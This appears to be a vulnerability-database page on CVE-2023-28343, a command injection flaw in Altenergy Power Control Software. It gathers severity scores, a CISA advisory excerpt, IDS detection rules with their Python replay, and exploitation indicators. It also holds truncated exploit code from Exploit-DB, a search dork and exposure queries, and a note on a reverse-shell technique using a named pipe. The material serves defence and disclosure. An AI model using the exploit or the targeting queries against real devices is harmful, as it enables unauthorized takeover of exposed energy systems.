CVE-2023-28343
Published 2023-03-14. CVE-2023-28343: OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter.
Priority P1 · 91 · critical 9.8 · CVSS 3.1 (AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H)
ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS 85.33% (99.7th percentile)
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apsystems | energy_communication_unit_firmware | — | — |
Detection & IOCs (extracted from sources)
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/management/set_timezone"; fast_pattern; endswith; http.request_body; content:"timezone="; pcre:"/^[^&]{0,50}(?:%60|%24|%3B)/PRi"; reference:url,github.com/superzerosec/CVE-2023-28343; reference:cve,2023-28343; classtype:attempted-admin; sid:2044825; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2023_03_28, cve CVE_2022_25237, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_29, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
- Exploit sends HTTP POST to /index.php/management/set_timezone with shell metacharacters (backtick, $, ;) in the 'timezone' body parameter. Look for URL-encoded variants: %60 (backtick), %24 ($), %3B (;) in the request body.
- Exploit sets specific HTTP headers: X-Requested-With: XMLHttpRequest and Content-Type: application/x-www-form-urlencoded; charset=UTF-8. Referer is set to /index.php/management/datetime. Combination of these with a POST to set_timezone is a strong signal.
- Successful exploitation returns HTTP 200 with body containing 'Time Zone updated successfully' and Content-Type text/html. Monitor for this response following suspicious timezone POST requests.
- Shodan/FOFA exposure: devices with title 'Altenergy Power Control Software' are the target surface. Use these queries to identify exposed assets.
- The exploit creates a named pipe at /tmp/pipe and spawns /bin/sh — monitor for mknod calls creating FIFOs in /tmp and subsequent shell execution from web server processes.
- DNS interaction (OOB) via nslookup is used for blind detection of the injection. Monitor outbound DNS queries originating from the web server process as an indicator of successful exploitation.
- APSystems has not responded to CISA mitigation requests; no vendor patch is confirmed available. Detection and network isolation are the primary defensive options.
- The vulnerability requires no authentication (PR:N, UI:N), meaning any network-reachable instance is exploitable without credentials.
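As an added defender-side example (not code from the page or from any of the listed sources), the function below reimplements the matching conditions of the ET rule above (SID 2044825) in Python and runs them over constructed sample requests, so the rule's logic can be replayed against requests pulled from your own web server logs:

```python
import re

# Constructed sample requests (not from the page), as (method, uri, body).
SAMPLE_REQUESTS = [
    ("POST", "/index.php/management/set_timezone", "timezone=Europe%2FLondon"),       # benign value
    ("POST", "/index.php/management/set_timezone", "timezone=UTC%3Bid"),            # encoded ';'
    ("POST", "/index.php/management/set_timezone", "timezone=%60id%60"),             # encoded backtick
    ("POST", "/index.php/management/set_timezone", "timezone=Asia%2FTokyo&x=%24a"),  # '$' only after '&'
    ("GET",  "/index.php/management/set_timezone?timezone=%3Bid", ""),               # wrong method
    ("POST", "/index.php/management/datetime", "timezone=%3Bid"),                    # wrong URI
]

# Same regex as the rule's pcre: from the start of the value, at most 50
# non-'&' characters, then one of %60 (`), %24 ($) or %3B (;); 'i' flag -> IGNORECASE.
METACHAR_RE = re.compile(r"^[^&]{0,50}(?:%60|%24|%3B)", re.IGNORECASE)
PARAM = "timezone="


def matches_rule(method: str, uri: str, body: str) -> bool:
    """True when a request satisfies every condition of ET SID 2044825."""
    # http.method; content:"POST"
    if method != "POST":
        return False
    # http.uri; content:"/management/set_timezone"; endswith
    if not uri.endswith("/management/set_timezone"):
        return False
    # http.request_body; content:"timezone="; pcre with 'R' (relative to that match).
    # Try every occurrence of the parameter name, as the engine would on a failed pcre.
    start = 0
    while (idx := body.find(PARAM, start)) >= 0:
        if METACHAR_RE.match(body[idx + len(PARAM):]):
            return True
        start = idx + 1
    return False


def scan(requests):
    """Return the indexes of the requests that would trigger the rule."""
    return [i for i, (m, u, b) in enumerate(requests) if matches_rule(m, u, b)]


if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        print("ALERT sid:2044825 on sample", i, SAMPLE_REQUESTS[i])
```

Note that the rule only inspects the three URL-encoded bytes it names within the first 50 characters of the parameter value, so local tuning may be needed for your environment.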
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.8 CRITICAL
GHSA
GHSA-77pg-3832-hjf8: OS command injection affects Altenergy Power Control Software C1
ghsa_unreviewed · 2023-03-14 · CRITICAL · CWE-78
VulnCheck
apsystems energy_communication_unit_firmware: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2023 · CVSS 9.8 · CRITICAL
Affected: apsystems energy_communication_unit_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-28343; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=20
CISA ICS
APSystems Altenergy Power Control
cisa_ics · 2023-08-01 · CVSS 9.8 · CRITICAL
ICS Advisory ICSA-23-213-01, release date August 01, 2023
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.8
- ATTENTION: Exploitable remotely / low attack complexity / public exploits available
- Vendor: APSystems
- Equipment: Altenergy Power Control
- Vulnerability: OS Command Injection
## 2. RISK EVALUATION
Successful exploitation of this vulnerability may allow remote code execution.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of Altenergy Power Control software are affected:
- Altenergy Power Control Software: C1.2.5
## 3.2 VULNERABILITY OVERVIEW
3.2.1 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') CWE-78
OS command injection affe
Suricata
ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)
suricata · 2023-03-28 · CVSS 9.8 · CRITICAL
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/management/set_timezone"; fast_pattern; endswith; http.request_body; content:"timezone="; pcre:"/^[^&]{0,50}(?:%60|%24|%3B)/PRi"; reference:url,github.com/superzerosec/CVE-2023-28343; reference:cve,2023-28343; classtype:attempted-admin; sid:2044825; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2023_03_28, cve CVE_2022_25237, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpo
Exploit-DB
Altenergy Power Control Software C1.2.5 - OS command injection
exploitdb · 2023-04-08 · CVSS 9.8 · CRITICAL
---
# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343
import requests
import argparse
def exploit(target,attacker,port):
url = f'{target}/index.php/management/set_timezone'
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Or
Nuclei
Altenergy Power Control Software C1.2.5 - Remote Command Injection
nuclei · CVSS 9.8 · CRITICAL
Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
Template:
id: CVE-2023-28343
info:
name: Altenergy Power Control Software C1.2.5 - Remote Command Injection
author: pikpikcu
severity: critical
description: |
Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management
No writeups or analysis indexed.
References:
- http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html
- https://apsystems.com
- https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md